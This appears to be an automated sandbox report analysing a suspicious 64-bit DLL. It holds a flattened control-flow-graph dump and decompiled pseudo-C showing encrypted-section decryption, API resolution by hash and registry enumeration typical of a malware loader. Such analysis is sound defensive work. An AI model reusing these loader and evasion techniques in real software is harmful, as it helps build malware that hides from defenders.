5133 180005e70 5132->5133 5133->5131 5134 180005ea9 5133->5134 5135 18000459c SetLastError 5134->5135 5136 180005ec1 HeapAlloc 5135->5136 5136->5128 5138 180005f0a 5136->5138 5139 18000459c SetLastError 5138->5139 5140 180005f18 5139->5140 5141 180005f95 GetLastError 5140->5141 5142 180005f4b HeapAlloc 5140->5142 5143 180005f9d HeapFree 5141->5143 5144 180005f75 wcstombs 5142->5144 5145 180005f8e 5142->5145 5143->5128 5144->5143 5145->5143 5147 18000459c SetLastError 5146->5147 5148 180003ffc 5147->5148 5149 180004151 GetLastError 5148->5149 5150 180004018 5148->5150 5152 18000412f 5149->5152 5151 18000403c HeapAlloc 5150->5151 5150->5152 5151->5152 5160 180004059 5151->5160 5152->4968 5153 1800040b7 GetLastError 5154 1800040bf WaitForSingleObject 5153->5154 5155 18000410b 5154->5155 5154->5160 5156 180004110 HeapFree 5155->5156 5156->5152 5158 180004122 5156->5158 5157 18000459c SetLastError 5157->5160 5235 1800085e4 5158->5235 5160->5153 5160->5154 5160->5156 5160->5157 5161 180004101 GetLastError 5160->5161 5161->5156 5163 180003e7f 5162->5163 5166 180003e8d 5162->5166 5164 18000459c SetLastError 5163->5164 5164->5166 5165 180003ead 5168 180003ecd 5165->5168 5171 18000459c SetLastError 5165->5171 5166->5165 5167 18000459c SetLastError 5166->5167 5167->5165 5169 180003ee1 HeapFree 5168->5169 5170 180003eec 5168->5170 5169->5170 5172 180003ef5 HeapFree 5170->5172 5173 180003f00 5170->5173 5171->5168 5172->5173 5174 180003f14 5173->5174 5175 180003f09 HeapFree 5173->5175 5176 180003f28 HeapFree 5174->5176 5177 180003f1d HeapFree 5174->5177 5175->5174 5176->4911 5177->5176 5179 180004e26 HeapAlloc 5178->5179 5186 180004e9c 5178->5186 5180 180004ea9 HeapFree 5179->5180 5181 180004e3c 5179->5181 5180->5186 5231 180004994 5181->5231 5183 180004e6d memcpy lstrcpyA 5183->5186 5184 180004e8e lstrcpyA 5184->5186 5186->5113 5187 180004994 strchr 5188 180004e5f 5187->5188 5188->5183 5188->5184 5190 180007b04 3 API calls 5189->5190 5192 180002815 5190->5192 5191 180002a78 GetLastError 5216 180002a5d 5191->5216 5192->5191 5193 18000459c SetLastError 5192->5193 5194 180002854 HeapFree 5193->5194 5194->5191 5196 180002890 5194->5196 5198 18000459c SetLastError 5196->5198 5200 1800028a7 5196->5200 5197 180007b04 3 API calls 5199 1800028d9 5197->5199 5198->5200 5199->5191 5201 18000459c SetLastError 5199->5201 5202 18000290f 5199->5202 5200->5191 5200->5197 5201->5202 5203 18000459c SetLastError 5202->5203 5204 18000294c HeapFree 5203->5204 5204->5191 5206 180002982 5204->5206 5207 180007b04 3 API calls 5206->5207 5208 18000298d 5207->5208 5208->5191 5209 18000459c SetLastError 5208->5209 5210 1800029a7 HeapFree 5209->5210 5210->5191 5212 180002a08 5210->5212 5213 18000459c SetLastError 5212->5213 5214 180002a1f 5213->5214 5215 18000459c SetLastError 5214->5215 5214->5216 5215->5216 5216->5118 5216->5119 5217 180007b04 lstrlenA HeapAlloc 5216->5217 5218 180007b54 5217->5218 5219 180007b76 5217->5219 5220 180007b62 memset 5218->5220 5219->5119 5220->5219 5223 1800037d2 5221->5223 5222 18000459c SetLastError 5222->5223 5223->5222 5224 180003823 GetLastError 5223->5224 5225 18000388c 5223->5225 5226 1800038dc 5223->5226 5230 180003884 GetLastError 5223->5230 5224->5223 5225->5226 5227 18000459c SetLastError 5225->5227 5226->5118 5226->5125 5228 1800038ac 5227->5228 5228->5226 5229 1800038d4 GetLastError 5228->5229 5229->5226 5230->5225 5232 1800095bc 5231->5232 5233 1800049ab strchr 5232->5233 5234 1800049c0 5233->5234 5234->5187 5234->5188 5236 18000861b 5235->5236 5237 180008623 HeapAlloc 5236->5237 5238 18000868b 5236->5238 5237->5238 5239 18000863a 5237->5239 5238->5152 5239->5238 5240 18000867b HeapFree 5239->5240 5240->5238 5242 1800082db 5241->5242 5243 18000823c 5241->5243 5242->4927 5243->5242 5244 18000826a HeapAlloc 5243->5244 5244->5242 5245 180008286 memset memcpy memcpy 5244->5245 5245->5242 5247 180006ef8 5246->5247 5248 180006f12 HeapAlloc 5247->5248 5256 180006fe7 5247->5256 5249 180006f2f 5248->5249 5248->5256 5258 180006bac 5249->5258 5252 180007003 HeapFree 5252->5256 5253 180004a14 10 API calls 5254 180006fbc 5253->5254 5254->5252 5255 180002594 2 API calls 5254->5255 5257 180006fd6 5255->5257 5256->4932 5256->4933 5257->5252 5257->5256 5259 180006be3 5258->5259 5260 180006bd9 5258->5260 5264 18000a5a0 5259->5264 5260->5252 5260->5253 5263 180006c49 memcpy memset 5263->5260 5275 18000118c 5264->5275 5267 18000118c memset 5268 18000a5f9 5267->5268 5269 18000118c memset 5268->5269 5270 18000a613 5269->5270 5271 180006bfa 5270->5271 5279 180001eec memcpy 5270->5279 5271->5260 5271->5263 5273 18000a686 5274 18000a6a3 memset memset 5273->5274 5274->5271 5278 1800011aa 5275->5278 5276 1800011e6 memset 5277 1800011fb 5276->5277 5277->5267 5278->5276 5278->5277 5287 180003934 5279->5287 5281 180001f5b 5282 180003934 9 API calls 5281->5282 5283 180001f80 memset 5282->5283 5286 180001f9a 5283->5286 5284 180002081 memcpy memset memset 5284->5273 5285 180003934 9 API calls 5285->5286 5286->5284 5286->5285 5288 1800095c4 memset memcpy memset 5287->5288 5289 180003960 5288->5289 5290 180006298 memset memset memset memset memset 5289->5290 5291 180003978 memset 5290->5291 5291->5281 5293 18000588b 5292->5293 5294 18000578d 5292->5294 5295 180005896 WaitForSingleObject 5293->5295 5299 1800058ec 5293->5299 5294->5293 5296 180005861 5294->5296 5297 1800057a3 5294->5297 5295->5299 5298 1800024cc 2 API calls 5296->5298 5301 1800057dd 5296->5301 5297->5296 5297->5299 5303 1800057c4 5297->5303 5314 180005938 5297->5314 5309 180005875 5298->5309 5299->5301 5304 180005914 memset 5299->5304 5299->5314 5300 1800015ea HeapFree 5300->4807 5301->5300 5341 180005600 lstrlenA HeapAlloc 5301->5341 5302 18000599a 5302->5301 5337 180001a88 HeapAlloc 5302->5337 5303->5296 5307 1800057cf 5303->5307 5324 1800020dc lstrlenA memset HeapAlloc 5304->5324 5306 180007950 13 API calls 5310 180005988 HeapFree 5306->5310 5311 180005852 SetEvent 5307->5311 5312 1800057d6 5307->5312 5309->5301 5315 180002668 7 API calls 5309->5315 5310->5302 5311->5301 5312->5301 5321 1800024cc HeapAlloc 5312->5321 5314->5301 5314->5302 5314->5306 5320 18000581b 5315->5320 5318 18000582e HeapFree 5318->5301 5319 180002668 7 API calls 5319->5320 5320->5301 5320->5318 5322 180002511 5321->5322 5323 1800024ff memcpy 5321->5323 5322->5301 5322->5319 5323->5322 5325 180002163 memcpy 5324->5325 5326 180002287 5324->5326 5327 18000217d 5325->5327 5326->5314 5328 18000459c SetLastError 5327->5328 5329 180002279 HeapFree 5327->5329 5330 1800021e9 5328->5330 5329->5326 5331 18000459c SetLastError 5330->5331 5336 180002235 5330->5336 5334 18000220b 5331->5334 5332 18000459c SetLastError 5333 180002272 5332->5333 5333->5329 5335 18000459c SetLastError 5334->5335 5334->5336 5335->5336 5336->5329 5336->5332 5338 180001ad2 memset 5337->5338 5339 180001b1c 5337->5339 5346 180003a24 5338->5346 5339->5301 5342 18000565a GetSystemTime _snprintf EnterCriticalSection 5341->5342 5343 18000572f 5341->5343 5344 1800056dc LeaveCriticalSection HeapFree 5342->5344 5343->5300 5344->5343 5347 180003a53 5346->5347 5348 180003a5b memcpy InitializeCriticalSection CreateEventA 5346->5348 5353 180007950 13 API calls 5347->5353 5349 180003bd6 GetLastError 5348->5349 5350 180003ada CreateEventA 5348->5350 5349->5347 5351 180003bfc 5349->5351 5350->5349 5352 180003af8 CreateMutexA 5350->5352 5351->5339 5352->5349 5354 180003b1a 5352->5354 5355 180003bea 5353->5355 5356 180001c00 4 API calls 5354->5356 5355->5351 5357 18000459c SetLastError 5355->5357 5358 180003b24 5356->5358 5357->5351 5359 18000459c SetLastError 5358->5359 5360 180003b35 5359->5360 5361 180003b90 5360->5361 5362 18000459c SetLastError 5360->5362 5361->5349 5368 180006c8c 5361->5368 5366 180003b66 5362->5366 5365 180003bcc SwitchToThread 5365->5351 5366->5349 5367 18000459c SetLastError 5366->5367 5367->5361 5369 18000459c SetLastError 5368->5369 5370 180003bc3 5369->5370 5370->5349 5370->5365 5372 180008326 5371->5372 5373 18000799c 5371->5373 5374 18000459c SetLastError 5372->5374 5373->4818 5373->4819 5375 180008334 5374->5375 5376 18000459c SetLastError 5375->5376 5376->5373 5389 180003e14 5390 18000459c SetLastError 5389->5390 5391 180003e29 5390->5391 5498 18000a494 5499 18000a4a0 5498->5499 5502 18000a6ec 5499->5502 5503 18000a76b RaiseException 5502->5503 5508 18000a790 5502->5508 5505 18000a4df 5503->5505 5504 18000a824 LoadLibraryA 5506 18000a837 GetLastError 5504->5506 5507 18000a88f 5504->5507 5511 18000a84d 5506->5511 5512 18000a85f RaiseException 5506->5512 5513 18000a8cb FreeLibrary 5507->5513 5514 18000a89b 5507->5514 5508->5504 5508->5505 5508->5507 5509 18000a8b4 5508->5509 5509->5505 5510 18000a92b GetProcAddress 5509->5510 5510->5505 5515 18000a941 GetLastError 5510->5515 5511->5507 5511->5512 5512->5505 5513->5509 5514->5509 5516 18000a8a1 LocalAlloc 5514->5516 5517 18000a957 5515->5517 5516->5509 5517->5505 5518 18000a969 RaiseException 5517->5518 5518->5505 5477 1ff41c201d3 5479 1ff41c201de 5477->5479 5482 1ff41c201c6 5477->5482 5479->5477 5480 1ff41c20219 5479->5480 5479->5482 5483 1ff41c23edc 5479->5483 5480->5482 5487 1ff41c21c0b 5480->5487 5484 1ff41c23f1a 5483->5484 5485 1ff41c240bd RtlAllocateHeap 5484->5485 5486 1ff41c24020 5484->5486 5485->5486 5486->5479 5488 1ff41c21c29 5487->5488 5489 1ff41c21c1e RtlAllocateHeap 5488->5489 5490 1ff41c21c14 5488->5490 5489->5490 5490->5480 5524 18000a519 5525 18000a525 5524->5525 5526 18000a6ec 9 API calls 5525->5526 5527 18000a564 5526->5527 5491 180007a7c 5492 180007ab9 5491->5492 5493 180007a9d TerminateProcess CloseHandle CloseHandle 5491->5493 5494 180007ad2 5492->5494 5495 180007ac2 CloseHandle CloseHandle 5492->5495 5493->5492 5496 180007aeb HeapFree 5494->5496 5497 180007adb CloseHandle CloseHandle 5494->5497 5495->5494 5497->5496 5528 18000431c WaitForSingleObject 5529 18000449d 5528->5529 5530 18000435d 5528->5530 5532 18000459c SetLastError 5529->5532 5531 18000459c SetLastError 5530->5531 5533 180004367 memcpy 5531->5533 5536 1800044a7 5532->5536 5549 180004386 5533->5549 5535 180004568 GetLastError 5538 180004570 ReleaseMutex 5535->5538 5536->5535 5537 18000459c SetLastError 5536->5537 5539 1800044e0 5537->5539 5539->5535 5542 1800044fa SetEvent 5539->5542 5540 18000444d GetLastError 5540->5549 5541 18000459c SetLastError 5541->5549 5551 180004504 5542->5551 5543 180004481 WaitForSingleObject 5545 180004498 5543->5545 5543->5549 5544 180004461 ResetEvent WaitForSingleObject 5544->5549 5545->5538 5546 18000459c SetLastError 5546->5551 5547 180004435 GetLastError 5547->5543 5547->5549 5549->5540 5549->5541 5549->5543 5549->5544 5549->5547 5550 180008308 SetLastError 5549->5550 5553 18000440c SetEvent 5549->5553 5555 180008150 5549->5555 5550->5549 5551->5535 5551->5546 5552 1800091f8 10 API calls 5551->5552 5552->5551 5562 1800091f8 5553->5562 5571 180002a9c memset 5555->5571 5557 180008181 5558 18000459c SetLastError 5557->5558 5559 1800081c2 5557->5559 5560 1800081c0 5557->5560 5558->5557 5559->5560 5561 1800081c4 GetLastError 5559->5561 5560->5549 5561->5560 5563 180009221 5562->5563 5564 180009266 GetSystemTimeAsFileTime EnterCriticalSection LeaveCriticalSection 5563->5564 5565 180009322 5563->5565 5567 180006c8c SetLastError 5564->5567 5566 180009331 5565->5566 5568 180002770 4 API calls 5565->5568 5566->5549 5569 1800092d4 5567->5569 5568->5566 5569->5566 5570 1800092e9 GetLastError EnterCriticalSection LeaveCriticalSection 5569->5570 5570->5565 5570->5566 5572 180002b43 5571->5572 5573 180002ad7 lstrcpynA 5571->5573 5572->5557 5574 180002af6 5573->5574 5575 18000459c SetLastError 5574->5575 5576 180002b1a 5575->5576 5576->5572 5577 180002b39 GetLastError 5576->5577 5577->5572 5656 180007760 5659 1800077a6 5656->5659 5657 18000782b memcmp 5658 180007885 5657->5658 5660 180007844 5657->5660 5661 1800078b1 5658->5661 5662 180007890 memcmp 5658->5662 5659->5657 5659->5658 5665 180007b04 3 API calls 5660->5665 5663 1800078a9 5661->5663 5664 1800078b6 memcmp 5661->5664 5662->5663 5666 1800088b4 39 API calls 5663->5666 5664->5663 5667 18000784f 5665->5667 5668 180007909 5666->5668 5667->5668 5670 180001000 7 API calls 5667->5670 5669 180007914 5668->5669 5671 180007928 HeapFree 5668->5671 5672 180007870 HeapFree 5670->5672 5671->5669 5672->5668

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 18000508c-1800050da HeapAlloc 1 180005419 0->1 2 1800050e0-180005112 memset InitializeCriticalSection call 180008b44 0->2 4 18000541e-18000543a 1->4 6 180005118-180005131 call 180007678 call 18000459c 2->6 7 18000540f-180005417 call 180005578 2->7 14 180005133-180005142 6->14 15 180005144 6->15 7->4 16 180005147-18000514e 14->16 15->16 17 18000515b-180005184 HeapAlloc 16->17 18 180005150-180005156 GetLastError 16->18 21 180005226 17->21 22 18000518a-1800051b0 RegOpenKeyW 17->22 20 180005408-18000540d 18->20 20->4 20->7 23 18000522b-18000522e 21->23 24 1800051b2-1800051b4 22->24 25 180005216-180005224 HeapFree 22->25 23->7 26 180005234-180005280 memcpy call 180005ca4 23->26 27 1800051cf-1800051ec RegEnumKeyW 24->27 25->23 35 180005282-18000529a call 180005ca4 26->35 36 18000529c-18000529f 26->36 29 1800051b6-1800051ca call 180009110 27->29 30 1800051ee-1800051f7 27->30 29->30 40 1800051cc 29->40 33 180005203-180005214 RegCloseKey 30->33 34 1800051f9-180005200 30->34 33->25 33->26 34->33 35->36 36->7 39 1800052a5-1800052b6 call 180006dcc 36->39 44 1800052e2-1800052e5 39->44 45 1800052b8-1800052cc call 180003c24 39->45 40->27 44->7 46 1800052eb-1800052ee call 180008708 44->46 45->44 51 1800052ce-1800052de call 180003c24 45->51 50 1800052f3-1800052f6 46->50 52 180005302-180005323 50->52 53 1800052f8-1800052fd 50->53 51->44 56 180005325-18000532d 52->56 57 180005339 52->57 53->7 58 18000533c-18000533f 56->58 59 18000532f-180005337 call 180004ed8 56->59 57->58 61 180005341-180005346 58->61 62 18000534b-180005355 58->62 59->58 61->7 64 180005357-18000535f 62->64 65 18000536e 62->65 66 180005371-180005374 64->66 67 180005361-18000536c call 180004ed8 64->67 65->66 66->61 69 180005376-180005391 GetModuleHandleA 66->69 67->66 71 180005393-1800053a7 call 18000459c 69->71 72 1800053fb-180005403 call 180002b60 69->72 76 1800053a9-1800053bc GetCurrentThreadId 71->76 77 1800053be 71->77 72->20 78 1800053c1-1800053c4 76->78 77->78 78->18 80 1800053ca-1800053db call 18000459c 78->80 83 1800053dd-1800053ec 80->83 84 1800053ee 80->84 85 1800053f1-1800053f4 83->85 84->85 85->4 87 1800053f6 85->87 87->18
                  C-Code - Quality: 50%
                  			E0000000118000508C(void* __ecx, void* __esi, long long __rax, long long __rbx, long long __rcx, void* __r9) {
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				long _t55;
                  				long _t57;
                  				void* _t65;
                  				void* _t114;
                  				void* _t115;
                  				long long* _t146;
                  				void* _t147;
                  				void* _t153;
                  				int _t188;
                  				long long _t189;
                  				int _t191;
                  				long long _t192;
                  				struct _CRITICAL_SECTION* _t198;
                  				void* _t201;
                  				void* _t202;
                  				signed short* _t211;
                  				void* _t214;
                  				void* _t215;
                  				long long _t216;
                  				void* _t217;
                  				long _t219;
                  				long _t223;
                  				void* _t225;
                  
                  				_t154 = __rbx;
                  				_t146 = __rax;
                  				_t115 = __esi;
                  				 *((long long*)(_t201 + 0x20)) = __rbx;
                  				 *((long long*)(_t201 + 8)) = __rcx;
                  				_t202 = _t201 - 0x230;
                  				_t199 =  *0x8000d4a0;
                  				r14d =  *0x8000d498;
                  				HeapAlloc(_t225, _t223, _t219);
                  				r12d = 0;
                  				_t189 = __rax;
                  				if (__rax == _t217) goto 0x80005419;
                  				memset(_t217, _t188, _t191);
                  				InitializeCriticalSection(_t198);
                  				_t5 = _t189 + 0x98; // 0x98
                  				_t216 = _t5;
                  				 *_t216 = _t216;
                  				 *((long long*)(__rax + 0xa0)) = _t216;
                  				if (E00000001180008B44(__ecx, __rax - _t217, __rax, __rbx, _t191, __rbx, _t214) != r12d) goto 0x8000540f;
                  				E00000001180007678(__ecx, __rax, _t154, _t191);
                  				E0000000118000459C(0xdc444c2b, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t146 == _t217) goto 0x80005144;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t146();
                  				goto 0x80005147;
                  				_t147 = _t217;
                  				 *(_t189 + 0x28) = _t147;
                  				if (_t147 != _t217) goto 0x8000515b;
                  				GetLastError();
                  				goto 0x80005408;
                  				r8d = 0x1102;
                  				HeapAlloc(??, ??, ??);
                  				_t192 =  *0x8000d4a0;
                  				if (_t192 == _t217) goto 0x80005226;
                  				 *_t192 = r12w; // executed
                  				_t55 = RegOpenKeyW(??, ??, ??); // executed
                  				if (_t55 != r12d) goto 0x80005216;
                  				goto 0x800051cf;
                  				r12d = r12d + 1;
                  				if (E00000001180009110(0x180000000, _t154, _t192, _t202 + 0x20, _t192, _t202 + 0x278, _t214) != 0) goto 0x800051ee;
                  				r9d = 0x104; // executed
                  				_t57 = RegEnumKeyW(??, ??, ??, ??); // executed
                  				if (_t57 == 0) goto 0x800051b6;
                  				r12d = 0;
                  				if (_t57 != 0x103) goto 0x80005203;
                  				 *0x8000d480 = _t192;
                  				RegCloseKey(??); // executed
                  				if (r12d == r12d) goto 0x80005234;
                  				HeapFree(??, ??, ??);
                  				goto 0x8000522b;
                  				if (8 != r12d) goto 0x8000540f;
                  				_t193 =  *0x8000d490;
                  				r8d = 8;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t202 + 0x286)) = r12w;
                  				if (E00000001180005CA4(8, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x180011198) == r12d) goto 0x8000529c;
                  				if (E00000001180005CA4(_t61, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x1800111f0) != r12d) goto 0x8000540f;
                  				_t28 = _t189 + 8; // 0x8
                  				_t186 = _t28;
                  				if (E00000001180006DCC(_t154, _t189, _t28, _t189, _t193) != r12d) goto 0x800052e2;
                  				E00000001180003C24(_t154, _t189, _t28, _t189, _t193,  *0x8000d4a0);
                  				 *((long long*)(_t189 + 0x30)) = 0x180000000;
                  				if (0x180000000 == _t217) goto 0x800052e2;
                  				_t30 = _t189 + 8; // 0x8
                  				_t65 = E00000001180003C24(_t154, _t30, _t28, _t189, _t193,  *0x8000d4a0);
                  				 *((long long*)(_t189 + 0x38)) = 0x180000000;
                  				_t90 =  !=  ? r12d : 8;
                  				_t132 = ( !=  ? r12d : 8) - r12d;
                  				if (( !=  ? r12d : 8) != r12d) goto 0x8000540f;
                  				if (E00000001180008708(_t65, _t114, _t154, _t189, _t186) != r12d) goto 0x80005302;
                  				goto 0x8000540f;
                  				_t211 =  *0x8000d490 + 0x18000f000;
                  				r9d = _t211[1] & 0x0000ffff;
                  				r11d =  *_t211 & 0x0000ffff;
                  				_t215 = __r9 + 8;
                  				if (_t216 - _t215 <= 0) goto 0x80005339;
                  				if ((r14d ^ 0xe49a1e6d) == r12d) goto 0x8000533c;
                  				E00000001180004ED8(r14d ^ 0xe49a1e6d, __r9 +  &(_t211[4]));
                  				goto 0x8000533c;
                  				if (_t217 != _t217) goto 0x8000534b;
                  				goto 0x8000540f;
                  				r14d = r14d ^ 0xecb028fc;
                  				if (_t216 - _t215 <= 0) goto 0x8000536e;
                  				if (r14d == r12d) goto 0x80005371;
                  				E00000001180004ED8(r14d, __r9 +  &(_t211[4]));
                  				goto 0x80005371;
                  				_t153 = _t217;
                  				if (_t153 == _t217) goto 0x80005341;
                  				 *(_t189 + 0x40) = _t211;
                  				 *0x8000d488 = _t189;
                  				GetModuleHandleA(??);
                  				if (_t153 ==  *((intOrPtr*)(_t202 + 0x270))) goto 0x800053fb;
                  				E0000000118000459C(0xaade337c, _t153,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t153 == _t217) goto 0x800053be;
                  				r8d = GetCurrentThreadId();
                  				 *_t153();
                  				goto 0x800053c1;
                  				if (_t217 == _t217) goto 0x80005150;
                  				E0000000118000459C(0x1c8cff93, _t153,  *((intOrPtr*)(_t199 + 0x18)));
                  				if (_t153 == _t217) goto 0x800053ee;
                  				 *_t153();
                  				goto 0x800053f1;
                  				if (r12d != r12d) goto 0x8000541e;
                  				goto 0x80005150;
                  				asm("lock add dword [ebp+0x38], 0x1");
                  				if (E00000001180002B60(_t115, _t189, __r9, _t215, _t216) == r12d) goto 0x8000541e;
                  				E00000001180005578(_t154, _t189, _t217);
                  				goto 0x8000541e;
                  				return 8;
                  			}





























                  0x18000508c
                  0x18000508c
                  0x18000508c
                  0x18000508c
                  0x180005091
                  0x1800050a1
                  0x1800050a8
                  0x1800050b6
                  0x1800050cb
                  0x1800050d1
                  0x1800050d4
                  0x1800050da
                  0x1800050e8
                  0x1800050f1
                  0x1800050f7
                  0x1800050f7
                  0x1800050fe
                  0x180005101
                  0x180005112
                  0x18000511b
                  0x180005129
                  0x180005131
                  0x180005138
                  0x18000513b
                  0x180005140
                  0x180005142
                  0x180005144
                  0x180005147
                  0x18000514e
                  0x180005150
                  0x180005156
                  0x180005164
                  0x180005171
                  0x180005177
                  0x180005184
                  0x1800051a1
                  0x1800051a5
                  0x1800051b0
                  0x1800051b4
                  0x1800051be
                  0x1800051ca
                  0x1800051dc
                  0x1800051e2
                  0x1800051ec
                  0x1800051ee
                  0x1800051f7
                  0x1800051f9
                  0x18000520b
                  0x180005214
                  0x18000521e
                  0x180005224
                  0x18000522e
                  0x180005234
                  0x180005248
                  0x18000524e
                  0x18000526d
                  0x180005280
                  0x18000529f
                  0x1800052a5
                  0x1800052a5
                  0x1800052b6
                  0x1800052c0
                  0x1800052c5
                  0x1800052cc
                  0x1800052ce
                  0x1800052d2
                  0x1800052da
                  0x1800052de
                  0x1800052e2
                  0x1800052e5
                  0x1800052f6
                  0x1800052fd
                  0x180005302
                  0x18000530d
                  0x180005312
                  0x18000531c
                  0x180005323
                  0x18000532d
                  0x180005332
                  0x180005337
                  0x18000533f
                  0x180005346
                  0x18000534b
                  0x180005355
                  0x18000535f
                  0x180005367
                  0x18000536c
                  0x18000536e
                  0x180005374
                  0x180005378
                  0x18000537c
                  0x180005383
                  0x180005391
                  0x18000539c
                  0x1800053a7
                  0x1800053b4
                  0x1800053b7
                  0x1800053bc
                  0x1800053c4
                  0x1800053d3
                  0x1800053db
                  0x1800053ea
                  0x1800053ec
                  0x1800053f4
                  0x1800053f6
                  0x1800053fb
                  0x18000540d
                  0x180005412
                  0x180005417
                  0x18000543a

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: HandleModule$Heap$AllocErrorLast$CloseCriticalCurrentEnumFreeInitializeOpenSectionThreadmemcpymemset
                  • String ID:
                  • API String ID: 2014251338-0
                  • Opcode ID: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction ID: 9261d350846713a6d61e62943f4705d1cd3b2ba236d4958cf944a875f2eb3085
                  • Opcode Fuzzy Hash: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
                  • Instruction Fuzzy Hash: 1AA15C32204B4D92EAE6DB22E4953EE7391B78C7C5F50C421EA8A47795DE78CB9DC301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ErrorFileLast$CloseCreateDirectoryHandleInitQueryStringUnicode
                  • String ID:
                  • API String ID: 2375947951-0
                  • Opcode ID: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction ID: 86e8c0801eecd6214d3de86c7c9a3f36e2355b629a028b10123d7888b335a31b
                  • Opcode Fuzzy Hash: 6a213b4158cada7e0fc9009fce08ec59d8022234906b0ab491453136b5d08942
                  • Instruction Fuzzy Hash: A5319E72214B8486D7A1CF15E45439E77A1F78CBD4F588626EAAD43B88DF38CA48CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 38%
                  			E00000001180004F1C(long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r11) {
                  				intOrPtr _t22;
                  				intOrPtr _t23;
                  				void* _t46;
                  				long long _t56;
                  				void* _t72;
                  				intOrPtr* _t75;
                  				intOrPtr* _t76;
                  				long long _t80;
                  				long long _t82;
                  				void* _t83;
                  				long long _t85;
                  				void* _t91;
                  				void* _t92;
                  				long _t93;
                  				long _t95;
                  				long _t97;
                  
                  				_t92 = __r11;
                  				_t56 = _t85;
                  				 *((long long*)(_t56 + 8)) = __rbx;
                  				 *((long long*)(_t56 + 0x10)) = _t82;
                  				 *((long long*)(_t56 + 0x18)) = __rsi;
                  				 *((long long*)(_t56 + 0x20)) = __rdi;
                  				_t83 = __rcx;
                  				r8d = 0;
                  				HeapCreate(_t97, _t95, _t93); // executed
                  				_t80 = _t56;
                  				if (_t56 == 0) goto 0x8000506b;
                  				_t72 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                  				_t75 = _t56 + _t72 + 0x68;
                  				_t22 =  *_t75;
                  				if (_t22 == 0) goto 0x80004ffc;
                  				if (_t22 == 0x7373622e) goto 0x80004f8a;
                  				_t76 = _t75 + 0x28;
                  				_t23 =  *_t76;
                  				if (_t23 != 0) goto 0x80004f79;
                  				if (_t23 == 0) goto 0x80004ffc;
                  				r13d =  *(_t76 + 0x10);
                  				r12d =  *(_t76 + 0x14);
                  				r12d = r12d ^  *(_t72 + 8);
                  				r12d = r12d ^ r13d;
                  				HeapAlloc(??, ??, ??);
                  				if (_t56 == 0) goto 0x80004ff5;
                  				r9d = r12d;
                  				r8d = r13d;
                  				E00000001180002524(_t56, __rbx, _t56, _t72 + __rcx, _t80);
                  				r11d =  *((intOrPtr*)(_t76 + 0xc));
                  				 *0x8000d490 = _t56 - _t92 - _t83;
                  				 *0x8000d498 = E00000001180001B48(_t56, _t56 - _t92 - _t83 + 0x80011040);
                  				goto 0x80005001;
                  				goto 0x80005001;
                  				if (2 == 0) goto 0x80005010;
                  				HeapDestroy(??);
                  				goto 0x8000506b;
                  				HeapAlloc(??, ??, ??);
                  				if (0x80011040 != 0) goto 0x80005049;
                  				HeapDestroy(??);
                  				goto 0x8000506b;
                  				0x8000236a();
                  				 *0x180011048 = _t80;
                  				 *0x8000d4a0 = 0x80011040;
                  				return E0000000118000508C(0, _t46, 0x80011040, 0x80011040, _t83, _t91);
                  			}



















                  0x180004f1c
                  0x180004f1c
                  0x180004f1f
                  0x180004f23
                  0x180004f27
                  0x180004f2b
                  0x180004f39
                  0x180004f3c
                  0x180004f4b
                  0x180004f51
                  0x180004f57
                  0x180004f63
                  0x180004f6a
                  0x180004f6f
                  0x180004f73
                  0x180004f7e
                  0x180004f80
                  0x180004f84
                  0x180004f88
                  0x180004f8c
                  0x180004f8e
                  0x180004f92
                  0x180004f99
                  0x180004fa2
                  0x180004fa5
                  0x180004fb1
                  0x180004fb6
                  0x180004fb9
                  0x180004fc2
                  0x180004fc7
                  0x180004fdd
                  0x180004fed
                  0x180004ff3
                  0x180004ffa
                  0x180005003
                  0x180005008
                  0x18000500e
                  0x18000502b
                  0x180005037
                  0x18000503c
                  0x180005047
                  0x180005051
                  0x180005059
                  0x18000505d
                  0x18000508b

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
